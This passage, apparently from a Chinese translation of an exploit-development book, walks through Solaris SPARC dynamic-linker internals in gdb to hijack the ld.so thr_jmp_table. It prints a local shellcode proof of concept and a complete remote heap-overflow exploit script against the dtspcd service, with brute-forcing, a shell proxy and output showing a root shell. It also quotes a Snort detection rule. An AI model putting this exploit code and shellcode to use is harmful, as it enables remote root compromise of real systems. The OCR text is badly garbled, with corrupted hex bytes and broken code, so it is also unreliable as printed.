(gdb} 

0x207a0 in _PROCEDURE_LINKAGE TABLE () 

1: x/i $pc 0x207a0 « PROCEDURE LINKAGE TABLE »: save %sp, -64, %sp 
(gdb) 


0x207a4 in , PROCEDURE LINKAGE TABLE  () 
1: x/i $pc 0x207a4 « PROCEDURE LINKAGE TABLE -4»: 
call Oxffffffffff3b297c 


这 是 真正 的 cal1 指 令 ， 调 用 动态 链接 程序 的 入 口 函数 。 














(gdb) 

0x207a8 in _PROCEDURE_LINKAGE_TABLE () 

1: x/i Spe 0x207a8 <_PROCEDURE_LINKAGE_TABLE_+8>: nop 
DLE G cal lf#4> WEIR. 

(gdb) 


Oxff3b297c in ?? (} 
1: x/i $pc Oxffffffffff3b297c: mov $%i7, %o0 


此 刻 ， 我 们 正 位 于 1d. so 映射 的 内 存 映 像 里 。 为 了 简洁 起 见 ， 在 遇 到 目标 区 段 前 不 再 解释 每 
条 指令 。 下 面 就 是 这 个 简短 的 逆向 工程 会 话 。 

(gdb) 

: x/i $pc Oxffffffffff3b297c: mov %i7, $00 


1 
1: x/i $pc OOxffffffffff3b2980: save %sp, -96, %sp 
1: x/i $pc Oxffffffffff3Db2984: mov $10, %03 


%03 是 .text 内 的 地 址 ，printf() 在 那里 被 调用 。 


1: x/i $pc Oxffffffffff3b2988: add %i7, -4, $00 


%o0 是 PLT 的 地 址 。 


1: x/i $pc Oxffffffffff3b298c: srl %gl, Oxa, $gl 


sg1 是 printf() 在 PLT 内 的 入 口 编号 。 
1: x/i $pc Oxff£ffffffff3b2990: add $00, $gl1, $00 


%o0 是 PLT 里 printf() 的 地址 。 

1: x/i $pc  Oxffffffffff3b2994: mov %gl1, %ol 

sol 是 PLT 里 的 入 口 编号 。 

1: x/i Spe Oxffffffffff3b2998: call Oxffffffffff3c34c8 
1: x/i Spe Oxffffffffff3b299c: ld [ %17 + 8 ], &o2 








so2 包 含 PLT 里 的 第 4 个 整数 入 口 ， 它 指向 最 重要 的 动态 链接 程序 基础 一 一 结构 的 链表 ， 也 称 


为 链接 图 。 查 看 /usr/include/sys/1link.h 可 以 了 解 它 的 布局 。 
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现在 ， 用 下 面 的 参数 调用 0oxff3c34c8 位 置 的 函数 〈 忽 略 似乎 被 设置 的 高 位 ， 


0xffffffffff3c34c8 实 际 上 是 0xff3c34c8): 
func(address of PLT, slot. number_in_ PLT, address of link map,.text, address); 
Oxff3c34c8(0x20818, 0x78, Oxff3a0018, 0x10690); 


1: x/i Spc  Oxffffffffff3c34c8: save %sp, -144, %sp 
1: x/i Spe Oxffffffffff3c34cc: call  Oxffffffffff3c34dA 
1: x/i Spc Oxffffffffff3c34d0: sethi %hi(0x1f000), %ol 


基本 上 是 这 个 状态 : 保留 一 些 栈 并 把 输入 参数 移入 输入 寄存 器 。 现 在 , 我 们 处 理 的 所 有 以 前 
的 地 址 和 偏 移 量 都 在 si0 到 si3 的 寄存 器 里 。 把 sol 寄 存 器 设 为 0xL1f000 并 跳 到 0xff3c34d4 处 的 


leaf. 
id 0x20818 address of PLT 
il 0x78 slot_number_in_PLT 
i2 Oxff3a0018 ddress_of_link_map 
i3 0x10690 .text address 


1: x/i Spe Oxffffffffff3c34d4: mov %i3, $12 

1: x/i $pc OOxffffffffff3c34d8: add  $o1, Oxi19c, %ol 

1: x/i $pc OOxffffffffff3c34dc: mov %i2, $11 

1: x/i $pc Oxffffffffff3c34e0: add %ol, %07, %i4 

1: x/i $pc OOxffffffffff3c34e4: mov %1i0, $13 

1: x/i Spe  Oxffffffffff3c34e8: call Oxffffffffff3bda9c 
1: x/i $pc OOxffffffffff3c34ec: clr [ %fp + -4 ] 


BITS ERY SR STIR UAR, AE FF AE OR US BUR TCR BEER, 注意 : 内 
部 结构 的 地 址 保存 在 si4。 最 后 ， 这 段 指令 把 控制 权 交 给 0xff3bqa9c 处 的 函数 。 


1: x/i $pc Oxffffffffff3bda9c: save %sp, -96, $sp 
1: x/i $pc Oxffffffffff3bdaa0: call  Oxffffffffff3bdaa8 
1: x/i $pc Oxffffffffff3bdaa4: sethi  $hi(0x24800), %ol 


其 实 ， 这 段 代 码 把 so1 寄 存 器 设 为 0x24800， 以 调用 0xff3bdqaa8 处 的 函数 。 


x/i $pc Oxffffffffff3bdaa8: add %ol, 0x3c8, $o1 ! Ox24bc8 
x/i $pc Oxffffffffff3bdaac: add  $o1, $07, $10 
x/i Spe Oxffffffffff3bdab0: call OOxffffffffff3b92ec 
x/i Spe Oxffffffffff3bdab4: mov 1, %00 
这 段 代 码 把 前 面 的 0x24800 的 值 与 调用 者 的 地 址 〈 这 是 前 面 的 调用 指令 的 位 置 
0xff3baaa0) 相 加 ， 把 结果 复制 到 si0。 执 行 流 再 次 直接 转 到 0xff3b92ec 处 的 其 他 的 函数 。 


1: x/i $po Oxffffffffff3b92ec: mov %07, $05 
1: x/i Spe  Oxffffffffff3b92f0: call Oxffffffffff3b92f8 
1: x/i Spe OOxffffffffff3b92f4: sethi  $hi(0x29000), $o4 


和 以 前 的 块 相 同 ， 我 们 立即 用 额外 的 操作 把 控制 传 给 其 他 的 函数 。 用 0x29000 的 值 设置 so4。 
调用 者 的 位 置 保 存在 %o5 寄 存 器 里 ， 进 入 0xff3b92f8 处 的 函数 。 现在， 到 了 我 们 苦 苦 追寻 的 目标 
了 。 如 果 你 对 上 面 的 解释 感到 乏味 ， 那 现在 应 该 打 起 十 二 分 精神 了 。 


PRP RB 





226 $113 高 级 Solaris 破解 


1: x/i $pc Oxffffffffff3b92f8; add $04, 0x378, %o4 ! 0x29378 
1: x/i $pc Oxffffffffff3b92f£c: add $04, $07, %gl 


前 面 的 两 条 指令 被 译 成 804 + 0x378 + %o7， 也 就 是 0x29000 + 0x378 + Oxff3b92f0 Cil] 
用 者 的 位 置 )。 现 在 ，sg1 包 含 内 部 1a.soe 结 构 的 地 址 ， 对 破解 来 说 ， 那 是 重要 的 实现 途径 。 

1: x/i $pc 0xfftfffttfft3bp9300: mov %05, %07 

前 面 的 代码 段 CfragmenO 将 把 调用 者 的 调用 程序 移 到 我 们 的 调用 程序 的 地 址 。 移 动 调用 程 
序 的 过 程 将 使 当前 的 执行 块 回 到 调用 者 的 调用 程序 ， 而 不 是 最 初 的 调用 程序 。 


(gdb) info reg $g1 
gl Oxff3e2668 -12704152 


1: x/i Spe Oxffffffffff3b9304: ld [ %g1 + 0x30 ], $gl 
1: x/i $pc  Oxffffffffff309308: ld [ %g1 ], %g1 
1: x/i $pc  OOxffffffffff3b930c: jmp %gl 


(gdb) x/x $gl + 0x30 

Oxfffffffftff3e2698: Oxff3e21b4 

前 面 的 指令 能 被 译 为 包含 内 部 链接 程序 的 结构 地 址 %g1。 在 位 置 0x30 处 的 结构 的 成 员 是 一 个 
指向 函数 指针 表 的 指针 。 这 个 表 或 函数 指针 数组 的 第 一 个 入 口 被 下 面 的 jmp 指 令 派 遗 : 


struct internal_ld_stuff { 
Ox00:... 


0x30: unsigned long *ptr; 


}; 

通过 下 面 的 计算 ， 可 以 确定 函数 指针 表 的 位 置 。 
(gdb) x/x $g1 + 0x30 

Oxffffffftff3e2698: Oxff3e21b4 


总 之 ，0xff3e21b4 包 含 表 的 地 址 ， 表 的 第 一 个 入 口 将 是 动态 链接 程序 将 跳 转 的 下 一 个 函数 。 
在 这 一 点 , 我 们 将 检查 进程 内 的 动态 链接 程序 的 布局 ， 从 而 发 现 这 个 地 址 在 动态 链接 程序 的 符号 
表 内 有 一 个 入 口 ， 后 面 可 以 很 便捷 地 定位 它 。 

FF3B0000 136K read/exec /usr/lib/ld.so.1 

在 Solaris 8 操作 系统 里 ，0xff3b0000 是 被 映射 到 每 个 线程 地 址 空间 的 动态 链接 程序 里 的 地 
址 。 可 以 用 /usry/bin/pmap 程 序 检验 它 。 有 了 它 ， 就 可 以 在 1a.so 内 找到 函数 指针 表 〈 数 组 ) 的 
位 置 。 

bash-2.034 gdb -q 


(gdb) printf "0x%.8x\n", Oxff3e21b4 - Oxff3b0000 
0x000321b4 


0x000321b4 是 我 们 在 1a.so 内 找到 的 地 址 。 用 下 面 的 命令 可 以 显示 这 个 宝贝 : 


bash-2.03# nm -x /usr/lib/ld.so.1 | grep 0x000321b4 
[433] j0x000321b4|0x0000001c|OB3T |LOCL |0 |14 |thr. jmp table 
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thr jmp table (PDL) 原来 是 存储 内 部 1d. so 函数 指针 的 数组 。 现 在 ， 用 下 面 的 实 
例 代 码 检验 我 们 的 理论 。 


<hiyar.c> 


#include <stdio.h> 


/* http://1sd-pl.net */ 
char shellcode[]= /* 10*4+8 bytes */ 
"\x20\xbf\xff\xff" /* bn,a <shellcode-4> */ 
"\x20\xbfi\xff\xff" /* bn, a <shellcode> */ 
"\XxX7f\xff\xff\xff" /* call <shellcode+4> | */ 
"\x90\x03\xe0\x20" /* add %07,32, %00 */ 
"\x92\x02\x20\x10" /* add %00,16,%01 */ 
"\xcO\x22\x20\x08" /* st %g0, [%00+8] */ 
"\xd0\x22\x20\x10" /* st %00, [%00+16] */ 
"\xc0O\x22\x20\x14" /* st %g0, [%00+20] */ 
"\x82\x10\x20\x0b" /* mov 0x0b, %g1 */ 
"\x91\xd0\x20\x08" /* ta 8 */ 


"/bin/ksh" 


int 
main(int argc, char **argv) 


{ 
long *ptr; 
long *addr = (long *) shellcode; 
printf("la la lala laaaaa\n"); 


//ld.so base + thr_jmp_table 
// 1433] |0x000321b4|0x0000001c|OBJT |LOCL |0 |14  |thr jmp table 


//OxFF3B0000 + 0x000321b4 


ptr = (long *) Oxff3e21b4; 
*ptr++ = (long) ((long *) shellcode); 


strcmp("mocha", "latte"); //this will make us enter the dynamic linker 


//since there is no,prior call to stremp() 


H ` 
bash-2.03# gcc -o hiyar hiyar.c 
bash-2.03# ./hiyar 

la la lala laaaaa 

# 


执行 被 劫持 而 直接 转 到 shellcode，stzcmp () 从 来 没有 被 进入 。 这 个 方法 比 以 前 发 明 的 Solaris 
破解 技术 《例如 exitfns、 返 回 地 址 等 ) 都 更 可 靠 、 更 健壮 ， 因 此 ， 建 议 你 在 所 有 的 场合 都 用 它 
获取 执行 控制 。 由 于 带 各 种 补丁 的 1a. so.1 二 进 制 文件 会 引入 新 的 指令 ， 所 以 需要 编 一 个 简单 的 
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数据 库 来 保存 thr_jmp_table 偏 移 量 。 我 们 将 把 发 现 这 些 偏 移 量 的 练习 留 给 读者 , 如 果 可 能 的 话 ， 
最 好 包括 我 们 可 能 遗漏 的 、 来 自 不 同 补丁 的 额外 的 偏 移 量 。 


1) 


5.8 Generic 
5.8 Generic. 


0x000321b4 


2) 


5.8 Generic 
5.8 Generic 


0x000361d8 


3) 


108528-07 sun4u 
108528-09 sun4u 


thr jmp table 


108528-14 sun4u 
108528-15 sun4u 


thr jmp table 


SPARC SUNW,UltraAX-i2 
SPARC SUNW,Uitra-5, 10 


SPARC SUNW,UltraSPARC-IIi-cEngine 
SPARC SUNW,Ultra-5 10 


5.8 Generic, 108528-17 sun4u SPARC SUNW,Ultra-80 


0x000361e0 


4) 


5.8 Generic 


0x000381e8 


thr, jmp table 


108528-20 sun4u 


thr jmp table 


SPARC SUNW,Ultra-5 10 


接 下 来 ， 为 健壮 可 靠 地 获取 执行 控制 ， 我 们 将 在 远程 堆 溢 出 破解 中 演示 怎样 使 用 
thr_jmp_table。 引 入 一 个 包含 前 述 各 种 thr_jmp_table 位 置 的 偏 移 列表 , 现在, 就 可 以 通过 递 
增 堆 地 址 的 方法 进行 暴力 猜 解 了 。 我 们 也 需要 用 下 面 列 表 里 的 下 一 个 入 口 改变 thr_jmp_table 


的 偏 移 量 。 
self.thr jmp table = [ 0x321b4, 0x361d8, 0x361e0, 0x381e8 ] 
-T-------2----0----- dtsped_exp.py ----------------------------- 
# noir@olympos.org || noir@uberhax0r.net 


# Sinan Eren (c) 2003 
# dtspcd heap overflow 
# with all new shiny tricks baby ;) 


import socket 
import telnetlib 


import sys 


import string 


import struct 


import time 


import threading 
import random 


PORT = "6112" 
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CHANNEL ID = 2 
SPC_ABORT = 3 
SPC_REGISTER = 4 


class DTSPCDException (Exception): 


def 


def 


__init__(self, args=None): 
self.args = args 


__str__(self): 
return "self.args^ 


class DTSPCDClient: 


def 


def 


def 


def 


__ init__(self): 


self.seq = 1 


spc_register(self, user, buf): 
return "4 " + "\x00" + user + "\x00\x00" + "10" + "\x00" + buf 


spc_write(self, buf, cmd): 
self.data = "%$08x%02x%04x%04x " $ (CHANNEL ID, cmd, len(buf), self.seq) 
self.seq += 1 
self.data += buf 
if self.sck.send(self.data) < len(self.data): 
raise DTSPCDException, "network problem, packet not fully send" 


spc read(self): 
self.recvbuf - self.sck.recv(20) 


if len(self.recvbuf) < 20: 
raise DTSPCDException, "network problem, packet not fully received" 


self.chan - string.atol(self.recvbuf[:8], 16) 

self.cmd = string.atol(self.recvbuf[8:10], 16) 

self.mbl =  string.atol(self.recvbuf[10:14], 16) 

self.seqrecv - string.atol(self.recvbuf[14:18], 16) 

#print "chan, cmd, len, seq:", self.chan, self.cmd, self.mbl, self.seqrecv 


self.recvbuf - self.sck.recv(self.mbl) 


if len(self.recvbuf) « self.mbl: 
raise  DTSPCDException, "network problem, packet not fully recvied" 


return self.recvbuf 
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class DTSPCDExploit (DTSPCDClient): 


def 


+ exec(" 


def 


def 


. init (self, target, user="", port-PORT): 
self.user - user 
self.set_target (target) 
self.set_port (port) 
DTSPCDClient., init (self) 
#shellcode: write(0, "/bin/ksh", 8) + fent1(0, 
/bin/ksh"...) 
self.shellcode =\ 
"\xa4\x1leo\x40\x11"+\ 
"\xad\xic\x40\x1l1"4+\ 
"\xaa\xlco\x40\x11"+\ 
"\wa4d\xle\x40\x1i"+\ 
"\xa4\xlco\x40\x11"+\ 
"\xa4\xlco\x40\x11"4+\ 
"\x20\xbf\xff\xff"+\ 
"\xX20\xbf\xff\xff"+\ 
"\x7f\xff\xff\xff"+\ 
"\xa2\xlc\x40\xl11"+\ 
"\x90\x24\x40\x11"+\ 
"\X92\X10\x20\x09"+\ 
"\x94\x0C\K40\x11"4+\ 
"\x82\xK10\xZ20\x3e"+\ 
"\x91\xd0\x20\x08"+\ 
"\xa2\x04\x60\x01"+\ 
"\*B80O\xa4\x60\x02"+\ 
"\x04\xbf\xffi\xfa"+\ 
"\x90\x23\xcO\x0F£"+\ 
"\x92\x03\xe0\x58"+\ 
"\X94\KLO\K20\xK08"+\ 
"\x82\x10\x20\x04"+\ 
"\x91\xd0\x20\x08"+\ 
"\x90\x03\xe0\x58"+\ 
"\x92\x02\x20\x10"+\ 
"\xcO\x22\x20\x08"+\ 
"\xdO\x22\x20\x1L0"+\ 
"\xcO\x22\x20\x14"+\ 
"\x82\x1L0\x20\x0b"+\ 
"\x91\xd0\x%20\x08"+\ 
"\x2E\x62\x69\x6e"+\ 
"\x2E\x6b\x73\x68" 


set_user(self, user): 
self.user = user 


get_user(self): 
return self.user 


F_DUP2FD, 


0-1-2) 
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def set_target(self, target): 
try: 
self.target = socket.gethostbyname (target) 
except socket.gaierror, err: 
raise DTSPCDException, "DTSPCDExploit, Host: " + target + " " + err[1] 


def get target(seltf): 
return self.target 


def set port(self, port): 
self.port - string.atoi(port) 


def get port(self): 
return seif.port 


def get uname(self): 
self.setup() 
self.uname d = { "hostname": "", "os": "", "version": "", "arch": "" } 
self.spc_write(self.spc_register("root", "\x00"), SPC REGISTER) 


self.resp = self.spc readí) 
try: 
self.resp - 
self.resp[self.resp.index("1000")+5:len(self.resp)-1] 
except ValueError: 
raise DTSPCDException, "Non standard response to REGISTER cmd" 


self.resp - self.resp.split(":") 


self.uname d = { "hostname": self.resp[0],\ 
"os": self.resp[1],\ 
"version": self.resp[2],\ 
"arch": self.resp[3] ) 
print self.uname d 





self.spc write("", SPC ABORT) 
self.sck.close() 
def setup(self): 


try: 
self.sck - socket.socket(socket.AF INET, socket.SOCK, STREAM, 
Socket.IPPROTO IP) 
self.sck.connect((self.target, self.port)) 
except socket.error, err: 
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raise DTSPCDException, "DTSPCDExploit, Host: " + 
str(self.target) + ":"\ 
+ str(self.port) +" " + err[1] 


def exploit(self, retloc, retaddr): 


self.setup() 


self.ovf = "\xa4\x1c\x40\x11\x20\xbf\xff\xff" * ((4096 - 8 - 
ien(self.shellcode)) / 8) 


self.ovf += self.shellcode + "\x00\x00\x10\x3e" + "\xOO\x00\x00\x14" +\ 
"\x12\x12\x12\x12" + "\xff\xff\xff\xff" + "\x00\x00\x0£\xf4" +\ 
self.get_chunk(retloc, retaddr) 

self.ovf += "A" * ((0x103e - 8) - len(self.ovf)) 


#raw_input ("attach") 
self.spc write(self.spc register("", self.ovf), SPC REGISTER) 


time.sleep(0.1) 
self.check bd() 


dself.spc write("", SPC ABORT) 
self.sck.close() 
def get chunk(self, retloc, retaddr): 


return "\x12\x12\x12\x12" struct.pack(">1", retaddr) +\ 


+ 
"\x23\x23\x23\x23" + "\xff\xff\xff\xff" +\ 
"\x34\x34\x34\x34" + "\x45\x45\x45\x45" +\ 
"\x56\x56\x56\x56" + struct.pack(">1", (retloc - 8)) 

def attack(self): 

print "[*] retrieving remote version [*]" 
self.get uname() 
print "[*] exploiting ... [*]" 


#do some parsing later ;p 

self.ldso base = Oxff3b0000 #solaris 7, 8 also 9 

sSelf.thr jmp table = [ 0x321b4, 0x361d8, 0x361e0, 0x381e8 J 
#from various patch clusters 


self.increment = 0x400 


for each in self.thr jmp table: 
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self.retaddr base = 0x2c000 #vanilla solaris 8 heap brute 


start 
#almost always work! 


while self.retaddr base < Ox2f000: #heap brute force end 


print "trying; retloc: 0x%08x, retaddr: 0x%08x" %\ 
((self.ldso base«each), self.retaddr base) 
self.exploit((each«self.ldso base), self.retaddr base) 


Self.exploit((each«self.ldso base), self.retaddr base-4) 
self.retaddr, base += self.increment 


def check bd(self): 
try: 
self.recvbuf - self.sck.recv(100) 
if self.recvbuf.find("ksh") !- -1: 
print "got shellcode response: ", self.recvbuf ‘ 
self.proxy() 
except socket.error: 
pass 


return -1 
def proxy(self): 


self.t = telnetlib.Telnet () 

self.t.sock = self.sck 
self.t.write("unset HISTFILE;uname -a;\n") 
self.t.interact() 

sys.exit(1) 


def run(self): 
self .attack() 
return 


if name == " main": 


if len(sys.argv) « 2: 
print "usage: dtspcd exp.py target, ip" 
sys.exit(0) 


exp - DTSPCDExploit(sys.argv[11) 

#print "user, target, port: ", exp.get user(), exp.get target(), 
exp.get port() 

exp.run() 


看 看 这 个 破解 怎么 工作 。 
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juneof44:~/exploit_workshop/dtspcd_exp # python dtspcd_exp_book.py 
192.168.10.40 


[*] retrieving remote version [*] 
{'arch': 'sun4u', 'hostname': 'slint', 'og': 'SunOS', 'version': '5.8'] 
{*] exploiting ... [*] 


trying; retloc: Oxff3e21b4, retaddr: 0x0002c000 

trying; retloc: Oxff3e21b4, retaddr: 0x0002c400 

trying; retloc: Oxff3e21b4, retaddr: 0x0002c800 

got shellcode response:  /bin/ksh 

SunOS slint 5.8 Generic 108528-09 sun4u SPARC SUNW,Ultra-5 10 
id 

uid=0 (root) gid=0 (root) 


暴力 猜 解 将 在 root 目 录 中 留 下 一 个 core 文 件 ， 首 次 跳 到 堆 空间 时 并 没有 碰 到 负载 (nop + 
shellcode)。 对 于 事后 分 析 我 们 的 挂钩 技术 来 说 ， 这 个 core 文 件 是 一 个 好 的 起 点 。 我 们 花 点 时 间 
看 看 是 否 能 从 这 里 面 找 到 些 什么 。 

bash-2.03# gdb -q /usr/dt/bin/dtsped /core 

(no debugging symbols found)...Core was generated by 

^/usr/dt/bin/dtspcd'. 

Program terminated with signal 4, Illegal Instruction. 

Reading symbols from /usr/dt/lib/libDtSvc.so.1... 


Loaded symbols for /usr/platform/SUNW,Ultra-5 10/lib/libc psr.so.1 
#0 Ox2c820 in ?? () 

(gdb) bt 

#0  0x2c820 in ?? () 

#1 Oxff3c34f0 in ?? () 

#2  Oxff3b29a0 in ?? () 

#3 0x246e4 in PROCEDURE LINKAGE TABLE () 
#4  Ox12cO0c in Client Register () 

#5  0x12918 in SPCD Handle Client Data () 
#6  0x13e34 in SPCD MainLoopUntil () 

#7  0x12868 in main () 

(gdb) x/4i Ox12c0c - 8 





Ox12c04 «Client, Register-*64»: call 0x24744 «Xestrcmp» 

0x12c08 «Client Register-68»: add %g2, 0x108, $01 

Ox12c0c «Client Register-*72»: tst $00 

Ox12c10 «Client Register-76»: be 0x13264 «Client Register-1696» 
(gdb) x/3i 0x24744 

0x24744 «Xestromp»: sethi  $hi(O0x1b000), %g1 

0x24748 «Xestrcmp-*4»: b,a 0x246d8 « PROCEDURE LINKAGE TABLE » 
0x2474c <Xestrcemp+8>: nop 

(gdb) 


可 见 ， 由 于 有 一 条 非法 指令 ， 程 序 在 0x2c820 处 发 生 了 衣 演 ,或许 是 因为 我 们 下 降 的 范围 太 
小 而 没有 磁 到 nop。 后 面 的 栈 跟 踪 显 示 : 我 们 已 经 从 动态 链接 程序 跳 到 堆 了 ， 地 址 0xff3c34f0 
也 被 映射 到 ld.so.1 .text 区 段 驻 留 在 atspcd 地 址 空间 里 的 地 方 。 


11.2 Solaris SPARC 堆 溢 出 的 各 种 技巧 235 


注解 在 gdb 里 ， 可 以 用 bt 命令 执行 栈 跟踪 。 


11.2 Solaris SPARC 堆 溢 出 的 各 种 技巧 


正如 在 第 10 章 所 看 到 的 那样 , 使 用 内 部 堆 指 针 操 纵 宏 或 函数 改写 任意 内 存 地 址 的 每 个 堆 破解 
代码 ， 也 会 在 载荷 (nop + shellcode) 中 部 插入 在 破解 代码 的 伪造 块 中 使 用 的 长 字 之 一 。 这 是 个 
问题 ， 因 为 我 们 可 能 会 碰 到 这 个 长 字 ， 当 碰 到 它 时 ， 执 行将 被 终止 ， 这 个 字 很 可 能 是 一 条 非法 指 
令 。 破 解 通常 在 nop 缓 冲 区 中 间 的 某 个 地 方 插入 “jump some byte forward” 指 令 ， 并 假设 这 将 跳 
过 有 问题 的 长 字 并 进入 shellcode。 这 里 将 介绍 一 种 新 奇 的 、 使 堆 溢出 更 可 靠 的 nop 策 略 : 不 是 在 
nop 缓 冲 区 中 间 的 某 个 地 方 插 入 “jump forward” 指 令 ， 而 是 用 可 选 的 nop 达 到 目标 。 下 面 是 从 
dtspcd 破 解 代 码 里 得 到 的 一 对 nop: 


Ox2c7f8: bn,a Ox2c7f4 
Ox2c7fc: xor $11, $11, $12 


这 个 技巧 位 于 不 在 annual 指 令 里 的 分 支 内 ， 我 们 将 用 它 跳 过 下 一 条 xor 指 令 。 其 实 ， 我 们 只 
是 使 长 字 改 写 xor 指 令 之 一 ， 因 此 ， 可 以 正好 跳 过 它 。 有 两 个 方法 可 用 来 完成 这 类 nop 缓 冲 区 类 


型 的 布置 。 
下 面 是 一 个 失败 的 到 nop 缓 冲 区 的 跳 转 。 
0x2c800: bn,a Ox2c"7fc 
0Ox2c804: xor %11, $11, %12 
0x2c808: bn,a 0x2c804 
Ox2c80c: xor %11, $11, $12 
0x2c810: bn,a 0x2c80c 
0Ox2c814: xor $11, $11, $12 
Ox2c818: bn,a Ox2c814 
Ox2c81c: xor %11, %11, %12 
0x2c820: std %f62, [ $10 + Oxlac ] 


|-> overwritten with the fake chunk's long word 


假设 用 伪造 块 内 的 地 址 90x2c800 改 写 thr_jmp_table。 这 个 地 址 不 幸 改写 了 分 支 指令 之 一 ， 
而 不 是 所 要 求 的 xor 指 令 。 因 此 ， 跳 转 即 使 成 功 ， 也 会 因 指 令 非 法 而 走投无路 。 
下 面 是 一 个 成 功 的 到 nop 缓 冲 区 的 跳 转 。 


0x2c804: xor %11, %11, $12 
Ox2c808: bn,a 0x2c804 

Ox2c80c: xor %11, %11, $12 
Ox2c810: bn,a 0x2c80c 

0x2c814: xor %11, $11, %12 
0x2c818: bn,a 0x2c814 

Ox2c81c: xor %11, $11, $12 
Ox2c820; bn,a Ox2c81c 

0x2c824: std %f62, [ $i0 + Oxlac ] 


假设 这 次 运用 伪造 块 里 的 地 址 0ox2c804。 每 件 事 都 进展 得 很 顺利 ， 因 为 长 字 将 改写 xor 指 令 
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之 一 ， 所 以 我 们 将 很 愉快 地 跳 过 它 。 为 了 省 时 间 ， 无 需 再 确定 哪个 可 能 性 是 正确 的 ， 因 为 这 里 只 
有 两 种 可 能 性 。 如 果 尝 试 每 一 个 可 能 的 堆 地 址 两 次 ， 肯 定 能 碰 到 目标 。 再 次 执行 atspca 破 解 代 
码 中 的 以 下 代码 : 


self.exploit((each-self.ldso base), self.retaddr base) 
self.exploit((each«self.ldso base), self.retaddr_base+4) 


self.retaddr base += self.increment 

可 见 ， 每 个 可 能 的 retaddr 都 用 4 的 增 量 尝试 了 两 次 。 在 这 期 间 ， 我 们 假设 第 一 个 
retaddr_bass 可 能 改写 分 支 指令 而 不 是 xor 指 令 。 如果 两 个 都 不 工作 , 那 就 可 以 假设 这 个 堆 地 址 
不 正确 。 现 在 可 以 通过 把 递增 的 偏 移 量 (self.increment) 加 到 正确 的 堆 地 址 来 计算 新 地 址 。 
这 个 技术 将 使 基于 堆 的 破解 更 加 可 靠 。 

我 们 将 简短 地 解释 在 atspca 破 解 里 使 用 的 SPARC shellcode， 以 此 来 结束 本 节 内 容 。 这 个 
shellcode 假 设 输入 连接 总 是 绑 在 套 接 字 0 上 。 在 编写 的 时 候 ， 对 每 个 Solaris 操作 系统 上 运行 的 
qdtspcd 来 说 ， 这 是 正确 的 。 下 面 看 看 这 个 shellcode 怎 样 在 3 个 简单 的 步骤 内 实现 目标 。 

先 看 第 一 步 。 

write(0, "/bin/ksh", 8); 

为 了 让 破解 代码 (或 客户 端 , 在 于 你 怎么 看 待 脆弱 系统 的 破解 了 ) 知道 破解 成 功 了 , shellcode 
把 字符 串 "bin/ksh" 写 到 网 络 套 接 字 中 。 这 将 通知 破解 代码 停止 暴力 猜 解 , 应 该 进入 代理 循环 了 。 
你 可 能 在 想 为 什么 是 "/bin/ksh" 而 不 是 其 他 的 字符 串 呢 ? 选择 Korn shell 的 原因 是 我 们 不 想 通 过 
加 入 像 sSuccess 或 owned 之 类 的 字符 串 增加 shellcode 的 大 小 。 我 们 将 重复 利用 exec () 系统 调用 使 
用 过 的 字符 串 ， 从 而 节省 空间 。 

接 下 来 ， 进 行 第 二 步 。 

for(i-0; i < 3; i++) 

fcntl(0, F DUP2FD, i); 

我 们 只 为 套 接 字 0 复制 stdain、stdout 和 stderz 文 件 描 述 符 。 

直达 第 三 步 。 

exec("/bin/ksh", NULL); 

这 就 是 常见 的 Solaris/SPARC 风 格 的 shell 派 生 技 巧 。 这 个 汇编 组 件 使 用 字符 串 "/bin/ksh"， 
write() 组 件 也 用 它 通知 破解 代 人 碍 我 们 已 经 成 功 了 。 
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传统 意义 上 ，UNIX shellcode 一 般 依靠 连续 的 系统 调用 来 实现 基本 的 连通 性 和 权限 提升 ， 例 
如 ， 派 生 shell 并 与 网 络 套 接 字 连接 。connectback、findsoctet 和 bindsocket shelicode 等 是 最 常用 也 
是 用 得 最 多 的 shellcode， 为 远程 攻击 者 提供 了 最 基本 的 shell 访 问 。 在 编写 破解 的 过 程 中 普遍 选用 
同一 shellcode 将 使 基于 特征 的 IDS 广 商 很 容易 检测 到 破解 代码 。 按 字 节 精确 匹配 shellcode 或 普通 操 
作 不 是 那么 有 用 ， 但 IDS 厂 商 在 匹配 新 派生 shejj 与 客户 端 之 闻 传 递 的 命令 方面 却 非常 成 功 。 如 果 
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你 对 IDS 特 征 开发 感 兴趣 ， 我 们 推荐 Jack Koziol 写 的 《SNORT 入 侵 检测 实用 解决 方案 》。 这 本 书包 
含 很 多 精彩 内 容 ， 比 如 怎样 基于 捕获 的 原始 包 编写 Snort 特 征 等 。 

例如 ， 对 于 大 多 数 IDS 来 说 ， 在 网 络 上 发 现 22、80 和 443 等 端口 上 传输 明文 的 UNIX 命 令 (如 
uname -a. ps. idflls -1) 都 是 危险 信号 ， 因 此， 几乎 所 有 的 IDS 都 有 相应 的 规则 检测 这 样 的 
活动 。 在 你 的 网 络 上 ， 除 了 过 时 的 协议 外 (rlogin、rsh、telnet)， 你 应 该 从 未 看 到 过 以 明文 
传输 的 UNIX 命 令 。 这 即使 不 是 现代 UNIX shellcode 最 大 的 缺陷 ， 也 是 最 主要 的 缺陷 之 一 。 

让 我 们 看 一 条 来 自 Snort IDS 〈 版 本 2.0.0》 的 规则 。 

alert ip any any -> any any (msg:"ATTACK RESPONSES id check returned 


root"; 
content: "uid-0(root)" ; classtype:bad-unknown; sid:498; rev:3;) 


当 传 输 的 数据 包 包 会 uid=0 (root) 时 ， 将 触发 这 个 规则 。Snort IDS 自 带 的 
attack-responses.rules# 还 有 一 些 类 似 的 例子 。 

在 这 一 节 ， 我 们 将 介绍 shelicode 的 端 对 端 加 密 。 为 了 完全 加 密 数 据 通 信 ， 我 们 甚至 采用 近 平 
极端 的 方式 ， 用 blowfish 加 密 shellcode。 在 努力 构造 blowfish 加 密 通 信 信 道 的 过 程 中 ， 我 们 还 发 现 
了 最 近 的 UNIX shellcode 的 其 他 方面 的 主要 限制 。 当 前 的 shellocde 技 术 基 于 直接 的 系统 调用 执行 
(int 0x80, ta 0x8)， 对 开发 复杂 的 任务 来 说 ， 这 是 非常 有 限 的 。 因 此 需要 具备 定位 并 加 载 地 
址 空间 里 的 各 种 库 函 数 的 能 力 ， 用 各 种 库 函 数 CAPD 完成 目标 。Win32 破 解 开发 程序 受益 于 
加 载 库 函 数 的 杰出 灵活 性 ， 为 各 种 任务 定位 和 使 用 API 已 经 很 长 一 段 时 间 了 .本 书 介绍 
Windows 时 对 这 些 技术 有 详细 的 描述 。) 现在 ， 对 UNIX shellcode 来 说 ， 是 该 用 _alsym() 和 
